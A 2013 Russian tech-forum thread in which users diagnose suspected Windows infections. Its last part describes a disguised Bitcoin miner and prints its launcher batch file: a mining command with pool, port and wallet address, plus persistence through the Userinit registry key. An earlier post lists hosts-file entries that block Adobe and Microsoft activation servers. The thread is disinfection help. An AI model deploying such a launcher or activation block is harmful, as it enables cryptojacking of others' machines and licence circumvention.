motofan logo
2 страниц V  1 2 >        
> 

Вирусы, помогаем избавляться от болячек

J()KER
сообщение 3.2.2013, 19:20


man_of_motley
*******

Группа: Пользователи
Сообщений: 1 705
Регистрация: 1.6.2008
Пользователь №: 173 781
Модель телефона: Atrix 4G; ROKR E8; Moto X
Прошивка: my mod


Настроение:
DON'T PANIC!



Рейтинг: 1050



Недавно зашел на сайт
А после этого опера иногда перестает понимать https (другие браузеры в это время с ними нормально дружат) помогает переподключение интернета. Подозреваю во всем файл windows\system32\lsass.exe (скрины прикрепил)
Помогите определить, кто шарит, вирус это или нет

Сообщение отредактировал J()KER - 3.2.2013, 19:21
Прикрепленное изображение Прикрепленное изображение Прикрепленное изображение Прикрепленное изображение
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
Osta
сообщение 3.2.2013, 20:10


Freestyler
********

Группа: Координаторы
Сообщений: 10 329
Регистрация: 20.7.2004
Пользователь №: 8 235
Модель телефона: Moto
Прошивка: *#9999#


Настроение:
Все невыспавшиеся в следующей жизни будут котами



Рейтинг: 4362



Google Safebrowsing Malware site

https://www.virustotal.com/#url
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
Andy51
сообщение 3.2.2013, 20:10


0xFFFF
******

Группа: Разработчики
Сообщений: 832
Регистрация: 28.3.2006
Из: Нижний Новгород
Пользователь №: 76 255
Модель телефона: E398, Milestone 2
Прошивка: 49R w/ElfPack2


Настроение:
^^,



Рейтинг: 1224



J()KER, https://www.virustotal.com что говорит?
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
VINRARUS
сообщение 3.2.2013, 20:12


Термоядерный
********

Группа: Пользователи
Сообщений: 3 315
Регистрация: 12.12.2009
Из: Чорнобиль
Пользователь №: 211 044
Модель телефона: WX160 & L7 & Z6 & ZN5-128
Прошивка: 740 MHz: Z6 and ZN5


Настроение:
Радиоактивные осадки...



Рейтинг: 1110



У меня он тоже висит в процесах.
Прикрепленное изображение
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
Claus398
сообщение 3.2.2013, 20:21


Авторитет
********

Группа: Разработчики сайта
Сообщений: 12 239
Регистрация: 6.7.2007
Из: Украина. Кривой Рог
Пользователь №: 140 536
Модель телефона: Motorola Rokr E1
Прошивка: My skins mod


Настроение:
Пишу обзоры за еду



Рейтинг: 3107



у меня также(
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
J()KER
сообщение 3.2.2013, 20:34


man_of_motley
*******

Группа: Пользователи
Сообщений: 1 705
Регистрация: 1.6.2008
Пользователь №: 173 781
Модель телефона: Atrix 4G; ROKR E8; Moto X
Прошивка: my mod


Настроение:
DON'T PANIC!



Рейтинг: 1050



VINRARUS, Claus398, прекратить панику, он и должен висеть в процессах, так как это системная служба винды, просто на моей машине подозреваю что этот файл заражен
Osta, и что это значит?
Andy51, сказал что файл не заражен
еще прогоню cureit для надежности, посмотрю что он скажет

Сообщение отредактировал J()KER - 4.2.2013, 0:51
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
VINRARUS
сообщение 3.2.2013, 21:14


Термоядерный
********

Группа: Пользователи
Сообщений: 3 315
Регистрация: 12.12.2009
Из: Чорнобиль
Пользователь №: 211 044
Модель телефона: WX160 & L7 & Z6 & ZN5-128
Прошивка: 740 MHz: Z6 and ZN5


Настроение:
Радиоактивные осадки...



Рейтинг: 1110



Цитата(J()KER @ Сегодня, 22:34)
* просто на моей машине подозреваю что этот файл заражен

дату изменения глянь (хотя умный вирус сделает все как нада smile.gif ).
Цитата(J()KER @ Сегодня, 22:34)
* прекратить панику

laugh.gif
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
J()KER
сообщение 4.2.2013, 4:50


man_of_motley
*******

Группа: Пользователи
Сообщений: 1 705
Регистрация: 1.6.2008
Пользователь №: 173 781
Модель телефона: Atrix 4G; ROKR E8; Moto X
Прошивка: my mod


Настроение:
DON'T PANIC!



Рейтинг: 1050



Похоже отбой воздушной тревоги. CureIt тоже ничего не нашел, только удалил из файла hosts это
Код
127.0.0.1 validation.sls.microsoft.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com

что я потом благополучно вернул на место)

Сообщение отредактировал J()KER - 4.2.2013, 5:01
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
J()KER
сообщение 4.8.2013, 15:30


man_of_motley
*******

Группа: Пользователи
Сообщений: 1 705
Регистрация: 1.6.2008
Пользователь №: 173 781
Модель телефона: Atrix 4G; ROKR E8; Moto X
Прошивка: my mod


Настроение:
DON'T PANIC!



Рейтинг: 1050



Месяц назад где-то подхватил на свой ноут DiabloMiner-Windows.exe немного замаскированный правда smile.gif
Ничего не замечал, пока не обновил джаву - система даже в простое не снижала оборотов кулера. Полез в диспетчер задач и нашел виновника - java.exe, не долго думая удалил джаву и ребутнул ноут, после того как винда стартанула открылся браузер и предложил... скачать яву laugh.gif .
Немного погуглив нашел человека с точно такой же траблой, как в его случае выяснилось во всем был виноват DiabloMiner-Windows.exe ( как я понял она считает биткоины, тоесть ктото за счет чужих мощностей пытается денюжку заработать). После прочтения форума откопал на харде ProcessExplorer, снова установил яву и ребутнул комп. Ситуация повторилась - java.exe загрузилось и начало нагружать проц и видеокарту. С помощью ProcessExplorer выяснил, что в моем слуыае орудует все тот же DiabloMiner-Windows.exe, только немного другой модификации aggressive.gif
Вобщем, вот список файлов которые я у себя нашел и которые нужно удалять:
mtconf.exe
mtconf.ini
system.vbs
system.bat
И папку target
Все эти радости находятся в %WINDIR%\SysWOW64, на 32 битных системах искать нужно в %WINDIR%\System32
Также нужно удалить из автозагрузки (я не заморачивался и удалил CCleanerom) ключ реестра который сназывается Userinit и содержит путь "C:\Windows\system32\system.vbs"

И еще: вот содержание system.bat
Код
cd C:\Windows\system32\
mtconf.exe -u 1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo -o pool.50btc.com -r 8332 -v 2 -w 128 -f 400

1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo - это я так понимаю id пользователя, его по этому id найти никак нельзя и чем нибудь нашкодить? smile.gif

______
PS. Не отключайте UAC =)

Сообщение отредактировал J()KER - 4.8.2013, 15:34
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
Venik
сообщение 4.8.2013, 15:43


Звезда По Имени Солнце
******

Группа: Пользователи
Сообщений: 1 070
Регистрация: 24.3.2009
Из: Санкт-Петербург
Пользователь №: 196 381
Модель телефона: Nokia N8

Рейтинг: 755



Цитата(J()KER @ Сегодня, 19:30)
* 1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo

Отличный пароль, кстати laugh.gif
Юзер вышелВ друзьяВизиткаП/Я
К началу страницы
+Ответить
Вирусы, помогаем избавляться от болячек · Компьютеры, OS, Soft и Hardware · Forum
 

2 страниц V  1 2 >
Ответ в темуСоздание новой темы
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Текстовая версия Сейчас: 17.11.2019, 23:11

Форум живёт: